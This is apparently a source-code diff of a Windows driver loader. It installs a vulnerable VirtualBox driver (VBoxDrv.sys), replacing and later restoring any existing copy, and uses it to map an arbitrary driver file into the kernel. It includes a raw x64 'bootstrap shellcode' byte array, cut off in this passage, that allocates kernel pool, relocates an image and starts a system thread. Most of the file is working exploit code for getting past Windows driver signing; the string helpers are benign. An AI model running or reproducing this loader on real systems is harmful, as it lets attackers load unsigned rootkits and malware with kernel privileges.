PBYTE DrvBuffer;
ULONG DataSize = 0, bytesIO;
HANDLE hDevice = INVALID_HANDLE_VALUE;
WCHAR szDriverFileName[MAX_PATH * 2];
SC_HANDLE schSCManager = NULL;
LPWSTR msg;
DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize);
while (DrvBuffer != NULL) {
//lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere.
RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName));
if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"),
g_ConsoleOutput, TRUE);
break;
}
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager == NULL) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error opening SCM database"),
g_ConsoleOutput, TRUE);
break;
}
//lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive
if (supIsObjectExists(L"\\Device", L"VBoxDrv")) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Active VirtualBox found in system, attempt unload it"),
g_ConsoleOutput, TRUE);
if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetAdp driver unloaded"),
g_ConsoleOutput, TRUE);
}
if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetLwf driver unloaded"),
g_ConsoleOutput, TRUE);
}
if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxUSBMon driver unloaded"),
g_ConsoleOutput, TRUE);
}
Sleep(1000);
if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxDrv driver unloaded"),
g_ConsoleOutput, TRUE);
}
}
//if vbox installed backup it driver, do it before dropping our
if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error while doing VirtualBox driver backup"),
g_ConsoleOutput, TRUE);
break;
}
}
//drop our vboxdrv version
_strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys"));
bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer,
(SIZE_T)DataSize, FALSE, FALSE);
if (bytesIO != DataSize) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error writing VirtualBox on disk"),
g_ConsoleOutput, TRUE);
break;
}
//if vbox not found in system install driver in scm
if (g_VBoxInstalled == FALSE) {
scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName);
}
//run driver
if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) {
if (scmOpenDevice(VBoxDrvSvc, &hDevice))
msg = TEXT("SCM: Vulnerable driver loaded and opened");
else
msg = TEXT("SCM: Driver device open failure");
}
else {
msg = TEXT("SCM: Vulnerable driver load failure");
}
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
break;
}
//post cleanup
if (schSCManager != NULL) {
CloseServiceHandle(schSCManager);
}
return hDevice;
}
/*
* TDLStopVulnerableDriver
*
* Purpose:
*
* Unload previously loaded vulnerable driver. If VirtualBox installed - restore original driver.
*
*/
void TDLStopVulnerableDriver(
VOID
)
{
SC_HANDLE schSCManager;
LPWSTR msg;
UNICODE_STRING uStr;
OBJECT_ATTRIBUTES ObjectAttributes;
cuiPrintText(g_ConOut,
TEXT("SCM: Unloading vulnerable driver"),
g_ConsoleOutput, TRUE);
if (g_hVBox != INVALID_HANDLE_VALUE)
CloseHandle(g_hVBox);
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager == NULL) {
cuiPrintText(g_ConOut,
TEXT("SCM: Cannot open database, unable unload driver"),
g_ConsoleOutput, TRUE);
return;
}
//stop driver in any case
if (scmStopDriver(schSCManager, VBoxDrvSvc))
msg = TEXT("SCM: Vulnerable driver successfully unloaded");
else
msg = TEXT("SCM: Unexpected error while unloading driver");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
//if VBox not installed - remove from scm database and delete file
if (g_VBoxInstalled == FALSE) {
if (scmRemoveDriver(schSCManager, VBoxDrvSvc))
msg = TEXT("SCM: Driver entry removed from registry");
else
msg = TEXT("SCM: Error removing driver entry from registry");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys");
InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL);
if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes)))
msg = TEXT("Ldr: Driver file removed");
else
msg = TEXT("Ldr: Error removing driver file");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
}
else {
//VBox software present, restore original driver and exit
if (supBackupVBoxDrv(TRUE))
msg = TEXT("Ldr: Original driver restored");
else
msg = TEXT("Ldr: Unexpected error while restoring original driver");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
}
CloseServiceHandle(schSCManager);
}
/*
* TDLProcessCommandLine
*
* Purpose:
*
* Extract target driver from command line and continue with it load.
*
*/
UINT TDLProcessCommandLine(
LPWSTR lpCommandLine
)
{
UINT retVal = (UINT)-1;
WCHAR szInputFile[MAX_PATH + 1];
ULONG c;
//input file
c = 0;
RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));
GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);
if (c == 0) {
cuiPrintText(g_ConOut,
T_LOADERUSAGE,
g_ConsoleOutput, FALSE);
return retVal;
}
if (PathFileExists(szInputFile)) {
g_hVBox = TDLStartVulnerableDriver();
if (g_hVBox != INVALID_HANDLE_VALUE) {
retVal = TDLMapDriver(szInputFile);
TDLStopVulnerableDriver();
}
}
else {
cuiPrintText(g_ConOut,
TEXT("Ldr: Input file not found"),
g_ConsoleOutput, FALSE);
}
return retVal;
}
/*
* TDLMain
*
* Purpose:
*
* Loader main.
*
*/
void TDLMain()
{
BOOL cond = FALSE;
UINT uResult = 0;
DWORD dwTemp;
LONG x;
OSVERSIONINFOW osv;
WCHAR text[256];
__security_init_cookie();
do {
g_hInstance = GetModuleHandle(NULL);
g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (g_ConOut == INVALID_HANDLE_VALUE) {
uResult = (UINT)-1;
break;
}
g_ConsoleOutput = TRUE;
if (!GetConsoleMode(g_ConOut, &dwTemp)) {
g_ConsoleOutput = FALSE;
}
SetConsoleTitle(T_LOADERTITLE);
SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
if (g_ConsoleOutput == FALSE) {
WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL);
}
cuiPrintText(g_ConOut,
T_LOADERINTRO,
g_ConsoleOutput, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
cuiPrintText(g_ConOut,
T_LOADERRUN,
g_ConsoleOutput, FALSE);
uResult = (UINT)-1;
break;
}
//check version first
RtlSecureZeroMemory(&osv, sizeof(osv));
osv.dwOSVersionInfoSize = sizeof(osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
if (osv.dwMajorVersion < 6) {
cuiPrintText(g_ConOut,
T_LOADERUNSUP,
g_ConsoleOutput, FALSE);
uResult = (UINT)-1;
break;
}
_strcpy(text, TEXT("Ldr: Windows v"));
ultostr(osv.dwMajorVersion, _strend(text));
_strcat(text, TEXT("."));
ultostr(osv.dwMinorVersion, _strend(text));
_strcat(text, TEXT(" build "));
ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Warning VirtualBox software installed, conficts possible"),
g_ConsoleOutput, TRUE);
}
uResult = TDLProcessCommandLine(GetCommandLine());
} while (cond);
InterlockedDecrement((PLONG)&g_lApplicationInstances);
ExitProcess(uResult);
}

View File

@ -0,0 +1,37 @@
#include "rtltypes.h"
char *_strcat_a(char *dest, const char *src)
{
if ( (dest==0) || (src==0) )
return dest;
while ( *dest!=0 )
dest++;
while ( *src!=0 ) {
*dest = *src;
dest++;
src++;
}
*dest = 0;
return dest;
}
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
if ( (dest==0) || (src==0) )
return dest;
while ( *dest!=0 )
dest++;
while ( *src!=0 ) {
*dest = *src;
dest++;
src++;
}
*dest = 0;
return dest;
}

View File

@ -0,0 +1,47 @@
#include "rtltypes.h"
int _strcmpi_a(const char *s1, const char *s2)
{
char c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
do {
c1 = locase_a(*s1);
c2 = locase_a(*s2);
s1++;
s2++;
} while ( (c1 != 0) && (c1 == c2) );
return (int)(c1 - c2);
}
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
{
wchar_t c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
do {
c1 = locase_w(*s1);
c2 = locase_w(*s2);
s1++;
s2++;
} while ( (c1 != 0) && (c1 == c2) );
return (int)(c1 - c2);
}

View File

@ -0,0 +1,43 @@
#include "rtltypes.h"
char *_strcpy_a(char *dest, const char *src)
{
char *p;
if ( (dest==0) || (src==0) )
return dest;
if (dest == src)
return dest;
p = dest;
while ( *src!=0 ) {
*p = *src;
p++;
src++;
}
*p = 0;
return dest;
}
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
wchar_t *p;
if ((dest == 0) || (src == 0))
return dest;
if (dest == src)
return dest;
p = dest;
while ( *src!=0 ) {
*p = *src;
p++;
src++;
}
*p = 0;
return dest;
}

View File

@ -0,0 +1,23 @@
#include "rtltypes.h"
char *_strend_a(const char *s)
{
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (char *)s;
}
wchar_t *_strend_w(const wchar_t *s)
{
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (wchar_t *)s;
}

View File

@ -0,0 +1,27 @@
#include "rtltypes.h"
size_t _strlen_a(const char *s)
{
char *s0 = (char *)s;
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (s-s0);
}
size_t _strlen_w(const wchar_t *s)
{
wchar_t *s0 = (wchar_t *)s;
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (s-s0);
}

View File

@ -0,0 +1,55 @@
#include "rtltypes.h"
int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
char c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
if ( cchars==0 )
return 0;
do {
c1 = locase_a(*s1);
c2 = locase_a(*s2);
s1++;
s2++;
cchars--;
} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
return (int)(c1 - c2);
}
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
wchar_t c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
if ( cchars==0 )
return 0;
do {
c1 = locase_w(*s1);
c2 = locase_w(*s2);
s1++;
s2++;
cchars--;
} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
return (int)(c1 - c2);
}

View File

@ -0,0 +1,180 @@
#include <windows.h>
BOOL GetCommandLineParamW(
IN LPCWSTR CmdLine,
IN ULONG ParamIndex,
OUT LPWSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
)
{
ULONG c, plen = 0;
TCHAR divider;
if (ParamLen != NULL)
*ParamLen = 0;
if (CmdLine == NULL) {
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
return FALSE;
}
for (c = 0; c <= ParamIndex; c++) {
plen = 0;
while (*CmdLine == ' ')
CmdLine++;
switch (*CmdLine) {
case 0:
goto zero_term_exit;
case '"':
CmdLine++;
divider = '"';
break;
default:
divider = ' ';
}
while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
plen++;
if (c == ParamIndex)
if ((plen < BufferSize) && (Buffer != NULL)) {
*Buffer = *CmdLine;
Buffer++;
}
CmdLine++;
}
if (*CmdLine != 0)
CmdLine++;
}
zero_term_exit:
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
if (ParamLen != NULL)
*ParamLen = plen;
if (plen < BufferSize)
return TRUE;
else
return FALSE;
}
BOOL GetCommandLineParamA(
IN LPCSTR CmdLine,
IN ULONG ParamIndex,
OUT LPSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
)
{
ULONG c, plen = 0;
TCHAR divider;
if (CmdLine == NULL)
return FALSE;
if (ParamLen != NULL)
*ParamLen = 0;
for (c = 0; c <= ParamIndex; c++) {
plen = 0;
while (*CmdLine == ' ')
CmdLine++;
switch (*CmdLine) {
case 0:
goto zero_term_exit;
case '"':
CmdLine++;
divider = '"';
break;
default:
divider = ' ';
}
while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
plen++;
if (c == ParamIndex)
if ((plen < BufferSize) && (Buffer != NULL)) {
*Buffer = *CmdLine;
Buffer++;
}
CmdLine++;
}
if (*CmdLine != 0)
CmdLine++;
}
zero_term_exit:
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
if (ParamLen != NULL)
*ParamLen = plen;
if (plen < BufferSize)
return TRUE;
else
return FALSE;
}
char *ExtractFilePathA(const char *FileName, char *FilePath)
{
char *p = (char *)FileName, *p0 = (char *)FileName;
if ((FileName == 0) || (FilePath == 0))
return 0;
while (*FileName != 0) {
if (*FileName == '\\')
p = (char *)FileName + 1;
FileName++;
}
while (p0 < p) {
*FilePath = *p0;
FilePath++;
p0++;
}
*FilePath = 0;
return FilePath;
}
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
{
wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;
if ((FileName == 0) || (FilePath == 0))
return 0;
while (*FileName != 0) {
if (*FileName == '\\')
p = (wchar_t *)FileName + 1;
FileName++;
}
while (p0 < p) {
*FilePath = *p0;
FilePath++;
p0++;
}
*FilePath = 0;
return FilePath;
}

View File

@ -0,0 +1,35 @@
#ifndef _CMDLINEH_
#define _CMDLINEH_
BOOL GetCommandLineParamW(
IN LPCWSTR CmdLine,
IN ULONG ParamIndex,
OUT LPWSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
);
BOOL GetCommandLineParamA(
IN LPCSTR CmdLine,
IN ULONG ParamIndex,
OUT LPSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
);
char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
#ifdef UNICODE
#define ExtractFilePath ExtractFilePathW
#define GetCommandLineParam GetCommandLineParamW
#else // ANSI
#define ExtractFilePath ExtractFilePathA
#define GetCommandLineParam GetCommandLineParamA
#endif
#endif /* _CMDLINEH_ */

View File

@ -0,0 +1,155 @@
/*
Module name:
minirtl.h
Description:
header for string handling and conversion routines
Date:
1 Mar 2015
*/
#ifndef _MINIRTL_
#define _MINIRTL_
// string copy/concat/length
char *_strend_a(const char *s);
wchar_t *_strend_w(const wchar_t *s);
char *_strcpy_a(char *dest, const char *src);
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);
char *_strcat_a(char *dest, const char *src);
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);
size_t _strlen_a(const char *s);
size_t _strlen_w(const wchar_t *s);
// comparing
int _strcmp_a(const char *s1, const char *s2);
int _strcmp_w(const wchar_t *s1, const wchar_t *s2);
int _strncmp_a(const char *s1, const char *s2, size_t cchars);
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
int _strcmpi_a(const char *s1, const char *s2);
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);
int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
char *_strstr_a(const char *s, const char *sub_s);
wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);
char *_strstri_a(const char *s, const char *sub_s);
wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);
// conversion of integer types to string, returning string length
size_t ultostr_a(unsigned long x, char *s);
size_t ultostr_w(unsigned long x, wchar_t *s);
size_t ultohex_a(unsigned long x, char *s);
size_t ultohex_w(unsigned long x, wchar_t *s);
size_t itostr_a(int x, char *s);
size_t itostr_w(int x, wchar_t *s);
size_t i64tostr_a(signed long long x, char *s);
size_t i64tostr_w(signed long long x, wchar_t *s);
size_t u64tostr_a(unsigned long long x, char *s);
size_t u64tostr_w(unsigned long long x, wchar_t *s);
size_t u64tohex_a(unsigned long long x, char *s);
size_t u64tohex_w(unsigned long long x, wchar_t *s);
// string to integers conversion
unsigned long strtoul_a(char *s);
unsigned long strtoul_w(wchar_t *s);
unsigned long long strtou64_a(char *s);
unsigned long long strtou64_w(wchar_t *s);
unsigned long hextoul_a(char *s);
unsigned long hextoul_w(wchar_t *s);
int strtoi_a(char *s);
int strtoi_w(wchar_t *s);
signed long long strtoi64_a(char *s);
signed long long strtoi64_w(wchar_t *s);
unsigned long long hextou64_a(char *s);
unsigned long long hextou64_w(wchar_t *s);
/* =================================== */
#ifdef UNICODE
#define _strend _strend_w
#define _strcpy _strcpy_w
#define _strcat _strcat_w
#define _strlen _strlen_w
#define _strncpy _strncpy_w
#define _strcmp _strcmp_w
#define _strncmp _strncmp_w
#define _strcmpi _strcmpi_w
#define _strncmpi _strncmpi_w
#define _strstr _strstr_w
#define _strstri _strstri_w
#define ultostr ultostr_w
#define ultohex ultohex_w
#define itostr itostr_w
#define i64tostr i64tostr_w
#define u64tostr u64tostr_w
#define u64tohex u64tohex_w
#define strtoul strtoul_w
#define hextoul hextoul_w
#define strtoi strtoi_w
#define strtoi64 strtoi64_w
#define strtou64 strtou64_w
#define hextou64 hextou64_w
#else // ANSI
#define _strend _strend_a
#define _strcpy _strcpy_a
#define _strcat _strcat_a
#define _strlen _strlen_a
#define _strncpy _strncpy_a
#define _strcmp _strcmp_a
#define _strcmp _strcmp_a
#define _strncmp _strncmp_a
#define _strcmpi _strcmpi_a
#define _strncmpi _strncmpi_a
#define _strstr _strstr_a
#define _strstri _strstri_a
#define ultostr ultostr_a
#define ultohex ultohex_a
#define itostr itostr_a
#define i64tostr i64tostr_a
#define u64tostr u64tostr_a
#define u64tohex u64tohex_a
#define strtoul strtoul_a
#define hextoul hextoul_a
#define strtoi strtoi_a
#define strtoi64 strtoi64_a
#define strtou64 strtou64_a
#define hextou64 hextou64_a
#endif
#endif /* _MINIRTL_ */

View File

@ -0,0 +1,43 @@
#ifndef _WCHAR_T_DEFINED
typedef unsigned short wchar_t;
#define _WCHAR_T_DEFINED
#endif /* _WCHAR_T_DEFINED */
#ifndef _SIZE_T_DEFINED
#ifdef _WIN64
typedef unsigned __int64 size_t;
#else /* _WIN64 */
typedef __w64 unsigned int size_t;
#endif /* _WIN64 */
#define _SIZE_T_DEFINED
#endif /* _SIZE_T_DEFINED */
__forceinline char locase_a(char c)
{
if ((c >= 'A') && (c <= 'Z'))
return c + 0x20;
else
return c;
}
__forceinline wchar_t locase_w(wchar_t c)
{
if ((c >= 'A') && (c <= 'Z'))
return c + 0x20;
else
return c;
}
__forceinline char byteabs(char x) {
if (x < 0)
return -x;
return x;
}
__forceinline int _isdigit_a(char x) {
return ((x >= '0') && (x <= '9'));
}
__forceinline int _isdigit_w(wchar_t x) {
return ((x >= L'0') && (x <= L'9'));
}

View File

@ -0,0 +1,49 @@
#include "rtltypes.h"
size_t u64tohex_a(unsigned long long x, char *s)
{
char p;
size_t c;
if (s==0)
return 16;
for (c=0; c<16; c++) {
p = (char)(x & 0xf);
x >>= 4;
if (p<10)
p += '0';
else
p = 'A' + (p-10);
s[15-c] = p;
}
s[16] = 0;
return 16;
}
size_t u64tohex_w(unsigned long long x, wchar_t *s)
{
wchar_t p;
size_t c;
if (s==0)
return 16;
for (c = 0; c<16; c++) {
p = (wchar_t)(x & 0xf);
x >>= 4;
if (p<10)
p += L'0';
else
p = L'A' + (p-10);
s[15-c] = p;
}
s[16] = 0;
return 16;
}

View File

@ -0,0 +1,45 @@
#include "rtltypes.h"
size_t u64tostr_a(unsigned long long x, char *s)
{
unsigned long long t = x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (char)(x % 10) + '0';
x /= 10;
}
s[r] = (char)0;
return r;
}
size_t u64tostr_w(unsigned long long x, wchar_t *s)
{
unsigned long long t = x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (wchar_t)(x % 10) + L'0';
x /= 10;
}
s[r] = (wchar_t)0;
return r;
}

View File

@ -0,0 +1,49 @@
#include "rtltypes.h"
size_t ultohex_a(unsigned long x, char *s)
{
char p;
size_t c;
if (s==0)
return 8;
for (c=0; c<8; c++) {
p = (char)(x & 0xf);
x >>= 4;
if (p<10)
p += '0';
else
p = 'A' + (p-10);
s[7-c] = p;
}
s[8] = 0;
return 8;
}
size_t ultohex_w(unsigned long x, wchar_t *s)
{
wchar_t p;
size_t c;
if (s==0)
return 8;
for (c=0; c<8; c++) {
p = (wchar_t)(x & 0xf);
x >>= 4;
if (p<10)
p += L'0';
else
p = L'A' + (p-10);
s[7-c] = p;
}
s[8] = 0;
return 8;
}

View File

@ -0,0 +1,45 @@
#include "rtltypes.h"
size_t ultostr_a(unsigned long x, char *s)
{
unsigned long t=x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (char)(x % 10) + '0';
x /= 10;
}
s[r] = (char)0;
return r;
}
size_t ultostr_w(unsigned long x, wchar_t *s)
{
unsigned long t=x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (wchar_t)(x % 10) + L'0';
x /= 10;
}
s[r] = (wchar_t)0;
return r;
}

4904
Source/Furutaka/ntos.h Normal file

File diff suppressed because it is too large Load Diff

BIN
Source/Furutaka/resource.h Normal file

Binary file not shown.

BIN
Source/Furutaka/resource.rc Normal file

Binary file not shown.

145
Source/Furutaka/shellcode.h Normal file
View File

@ -0,0 +1,145 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: SHELLCODE.H
*
* VERSION: 1.00
*
* DATE: 30 Jan 2016
*
* Loader bootstrap shellcode.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_Out_ PHANDLE ThreadHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext
);
/*
* TDLBootstrapLoader
*
* Purpose:
*
* Main part of shellcode used to execute driver code.
*
*/
/*
void TDLBootstrapLoader(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
ULONG isz = popth->SizeOfImage;
HANDLE th;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
OBJECT_ATTRIBUTES attr;
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
}
*/
static const unsigned char TDLBootstrapLoader_code[415] = {
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
